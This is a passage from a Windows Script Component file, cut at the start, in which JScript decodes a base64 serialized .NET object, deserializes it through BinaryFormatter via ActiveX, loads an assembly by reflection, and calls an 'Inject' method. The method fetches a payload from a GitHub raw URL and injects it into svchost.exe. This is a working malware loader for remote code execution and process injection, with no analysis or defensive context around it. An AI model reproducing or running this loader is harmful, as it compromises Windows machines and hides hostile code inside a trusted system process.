"c3NlbWJseSBtYW5pZmVzdFZlcnNpb249IjEuMCIgeG1sbnM9InVybjpzY2hlbWFzLW1pY3Jvc29m"+
"dC1jb206YXNtLnYxIj4KICA8YXNzZW1ibHlJZGVudGl0eSB2ZXJzaW9uPSIxLjAuMC4wIiBuYW1l"+
"PSJNeUFwcGxpY2F0aW9uLmFwcCIvPgogIDx0cnVzdEluZm8geG1sbnM9InVybjpzY2hlbWFzLW1p"+
"Y3Jvc29mdC1jb206YXNtLnYyIj4KICAgIDxzZWN1cml0eT4KICAgICAgPHJlcXVlc3RlZFByaXZp"+
"bGVnZXMgeG1sbnM9InVybjpzY2hlbWFzLW1pY3Jvc29mdC1jb206YXNtLnYzIj4KICAgICAgICA8"+
"IS0tIFVBQyBNYW5pZmVzdCBPcHRpb25zCiAgICAgICAgICAgICBJZiB5b3Ugd2FudCB0byBjaGFu"+
"Z2UgdGhlIFdpbmRvd3MgVXNlciBBY2NvdW50IENvbnRyb2wgbGV2ZWwgcmVwbGFjZSB0aGUgCiAg"+
"ICAgICAgICAgICByZXF1ZXN0ZWRFeGVjdXRpb25MZXZlbCBub2RlIHdpdGggb25lIG9mIHRoZSBm"+
"b2xsb3dpbmcuCgogICAgICAgIDxyZXF1ZXN0ZWRFeGVjdXRpb25MZXZlbCAgbGV2ZWw9ImFzSW52"+
"b2tlciIgdWlBY2Nlc3M9ImZhbHNlIiAvPgogICAgICAgIDxyZXF1ZXN0ZWRFeGVjdXRpb25MZXZl"+
"bCAgbGV2ZWw9InJlcXVpcmVBZG1pbmlzdHJhdG9yIiB1aUFjY2Vzcz0iZmFsc2UiIC8+CiAgICAg"+
"ICAgPHJlcXVlc3RlZEV4ZWN1dGlvbkxldmVsICBsZXZlbD0iaGlnaGVzdEF2YWlsYWJsZSIgdWlB"+
"Y2Nlc3M9ImZhbHNlIiAvPgoKICAgICAgICAgICAgU3BlY2lmeWluZyByZXF1ZXN0ZWRFeGVjdXRp"+
"b25MZXZlbCBlbGVtZW50IHdpbGwgZGlzYWJsZSBmaWxlIGFuZCByZWdpc3RyeSB2aXJ0dWFsaXph"+
"dGlvbi4gCiAgICAgICAgICAgIFJlbW92ZSB0aGlzIGVsZW1lbnQgaWYgeW91ciBhcHBsaWNhdGlv"+
"biByZXF1aXJlcyB0aGlzIHZpcnR1YWxpemF0aW9uIGZvciBiYWNrd2FyZHMKICAgICAgICAgICAg"+
"Y29tcGF0aWJpbGl0eS4KICAgICAgICAtLT4KICAgICAgICA8cmVxdWVzdGVkRXhlY3V0aW9uTGV2"+
"ZWwgbGV2ZWw9InJlcXVpcmVBZG1pbmlzdHJhdG9yIiB1aUFjY2Vzcz0iZmFsc2UiIC8+CiAgICAg"+
"IDwvcmVxdWVzdGVkUHJpdmlsZWdlcz4KICAgIDwvc2VjdXJpdHk+CiAgPC90cnVzdEluZm8+Cgog"+
"IDxjb21wYXRpYmlsaXR5IHhtbG5zPSJ1cm46c2NoZW1hcy1taWNyb3NvZnQtY29tOmNvbXBhdGli"+
"aWxpdHkudjEiPgogICAgPGFwcGxpY2F0aW9uPgogICAgICA8IS0tIEEgbGlzdCBvZiB0aGUgV2lu"+
"ZG93cyB2ZXJzaW9ucyB0aGF0IHRoaXMgYXBwbGljYXRpb24gaGFzIGJlZW4gdGVzdGVkIG9uCiAg"+
"ICAgICAgICAgYW5kIGlzIGRlc2lnbmVkIHRvIHdvcmsgd2l0aC4gVW5jb21tZW50IHRoZSBhcHBy"+
"b3ByaWF0ZSBlbGVtZW50cwogICAgICAgICAgIGFuZCBXaW5kb3dzIHdpbGwgYXV0b21hdGljYWxs"+
"eSBzZWxlY3QgdGhlIG1vc3QgY29tcGF0aWJsZSBlbnZpcm9ubWVudC4gLS0+CgogICAgICA8IS0t"+
"IFdpbmRvd3MgVmlzdGEgLS0+CiAgICAgIDwhLS08c3VwcG9ydGVkT1MgSWQ9IntlMjAxMTQ1Ny0x"+
"NTQ2LTQzYzUtYTVmZS0wMDhkZWVlM2QzZjB9IiAvPi0tPgoKICAgICAgPCEtLSBXaW5kb3dzIDcg"+
"LS0+CiAgICAgIDwhLS08c3VwcG9ydGVkT1MgSWQ9InszNTEzOGI5YS01ZDk2LTRmYmQtOGUyZC1h"+
"MjQ0MDIyNWY5M2F9IiAvPi0tPgoKICAgICAgPCEtLSBXaW5kb3dzIDggLS0+CiAgICAgIDwhLS08"+
"c3VwcG9ydGVkT1MgSWQ9Ins0YTJmMjhlMy01M2I5LTQ0NDEtYmE5Yy1kNjlkNGE0YTZlMzh9IiAv"+
"Pi0tPgoKICAgICAgPCEtLSBXaW5kb3dzIDguMSAtLT4KICAgICAgPCEtLTxzdXBwb3J0ZWRPUyBJ"+
"ZD0iezFmNjc2Yzc2LTgwZTEtNDIzOS05NWJiLTgzZDBmNmQwZGE3OH0iIC8+LS0+CgogICAgICA8"+
"IS0tIFdpbmRvd3MgMTAgLS0+CiAgICAgIDwhLS08c3VwcG9ydGVkT1MgSWQ9Ins4ZTBmN2ExMi1i"+
"ZmIzLTRmZTgtYjlhNS00OGZkNTBhMTVhOWF9IiAvPi0tPgoKICAgIDwvYXBwbGljYXRpb24+CiAg"+
"PC9jb21wYXRpYmlsaXR5PgoKICA8IS0tIEluZGljYXRlcyB0aGF0IHRoZSBhcHBsaWNhdGlvbiBp"+
"cyBEUEktYXdhcmUgYW5kIHdpbGwgbm90IGJlIGF1dG9tYXRpY2FsbHkgc2NhbGVkIGJ5IFdpbmRv"+
"d3MgYXQgaGlnaGVyCiAgICAgICBEUElzLiBXaW5kb3dzIFByZXNlbnRhdGlvbiBGb3VuZGF0aW9u"+
"IChXUEYpIGFwcGxpY2F0aW9ucyBhcmUgYXV0b21hdGljYWxseSBEUEktYXdhcmUgYW5kIGRvIG5v"+
"dCBuZWVkIAogICAgICAgdG8gb3B0IGluLiBXaW5kb3dzIEZvcm1zIGFwcGxpY2F0aW9ucyB0YXJn"+
"ZXRpbmcgLk5FVCBGcmFtZXdvcmsgNC42IHRoYXQgb3B0IGludG8gdGhpcyBzZXR0aW5nLCBzaG91"+
"bGQgCiAgICAgICBhbHNvIHNldCB0aGUgJ0VuYWJsZVdpbmRvd3NGb3Jtc0hpZ2hEcGlBdXRvUmVz"+
"aXppbmcnIHNldHRpbmcgdG8gJ3RydWUnIGluIHRoZWlyIGFwcC5jb25maWcuIAogICAgICAgCiAg"+
"ICAgICBNYWtlcyB0aGUgYXBwbGljYXRpb24gbG9uZy1wYXRoIGF3YXJlLiBTZWUgaHR0cHM6Ly9k"+
"b2NzLm1pY3Jvc29mdC5jb20vd2luZG93cy93aW4zMi9maWxlaW8vbWF4aW11bS1maWxlLXBhdGgt"+
"bGltaXRhdGlvbiAtLT4KICA8IS0tCiAgPGFwcGxpY2F0aW9uIHhtbG5zPSJ1cm46c2NoZW1hcy1t"+
"aWNyb3NvZnQtY29tOmFzbS52MyI+CiAgICA8d2luZG93c1NldHRpbmdzPgogICAgICA8ZHBpQXdh"+
"cmUgeG1sbnM9Imh0dHA6Ly9zY2hlbWFzLm1pY3Jvc29mdC5jb20vU01JLzIwMDUvV2luZG93c1Nl"+
"dHRpbmdzIj50cnVlPC9kcGlBd2FyZT4KICAgICAgPGxvbmdQYXRoQXdhcmUgeG1sbnM9Imh0dHA6"+
"Ly9zY2hlbWFzLm1pY3Jvc29mdC5jb20vU01JLzIwMTYvV2luZG93c1NldHRpbmdzIj50cnVlPC9s"+
"b25nUGF0aEF3YXJlPgogICAgPC93aW5kb3dzU2V0dGluZ3M+CiAgPC9hcHBsaWNhdGlvbj4KICAt"+
"LT4KCiAgPCEtLSBFbmFibGUgdGhlbWVzIGZvciBXaW5kb3dzIGNvbW1vbiBjb250cm9scyBhbmQg"+
"ZGlhbG9ncyAoV2luZG93cyBYUCBhbmQgbGF0ZXIpIC0tPgogIDwhLS0KICA8ZGVwZW5kZW5jeT4K"+
"ICAgIDxkZXBlbmRlbnRBc3NlbWJseT4KICAgICAgPGFzc2VtYmx5SWRlbnRpdHkKICAgICAgICAg"+
"IHR5cGU9IndpbjMyIgogICAgICAgICAgbmFtZT0iTWljcm9zb2Z0LldpbmRvd3MuQ29tbW9uLUNv"+
"bnRyb2xzIgogICAgICAgICAgdmVyc2lvbj0iNi4wLjAuMCIKICAgICAgICAgIHByb2Nlc3NvckFy"+
"Y2hpdGVjdHVyZT0iKiIKICAgICAgICAgIHB1YmxpY0tleVRva2VuPSI2NTk1YjY0MTQ0Y2NmMWRm"+
"IgogICAgICAgICAgbGFuZ3VhZ2U9IioiCiAgICAgICAgLz4KICAgIDwvZGVwZW5kZW50QXNzZW1i"+
"bHk+CiAgPC9kZXBlbmRlbmN5PgogIC0tPgoKPC9hc3NlbWJseT4KAAAAAAAAAAAAAAAAAAAAAAAA"+
"AAAAAAAAAQ0AAAAEAAAACRgAAAAJBgAAAAkXAAAABhsAAAAnU3lzdGVtLlJlZmxlY3Rpb24uQXNz"+
"ZW1ibHkgTG9hZChCeXRlW10pBhwAAAAuU3lzdGVtLlJlZmxlY3Rpb24uQXNzZW1ibHkgTG9hZChT"+
"eXN0ZW0uQnl0ZVtdKQgAAAAKCwAA";
var entry_class = 'abc.TestClass';

try {
	setversion();
	var stm = base64ToStream(serialized_obj);
	var fmt = new ActiveXObject('System.Runtime.Serialization.Formatters.Binary.BinaryFormatter');
	var al = new ActiveXObject('System.Collections.ArrayList');
	var d = fmt.Deserialize_2(stm);
	al.Add(undefined);
	var o = d.DynamicInvoke(al.ToArray()).CreateInstance(entry_class);
	o.Inject("https://github.com/sdfsersa/a/raw/refs/heads/main/lite", "C:\\Windows\\System32\\svchost.exe");

} catch (e) {
    debug(e.message);
}]]></script>
    </registration>
  </component>
</package>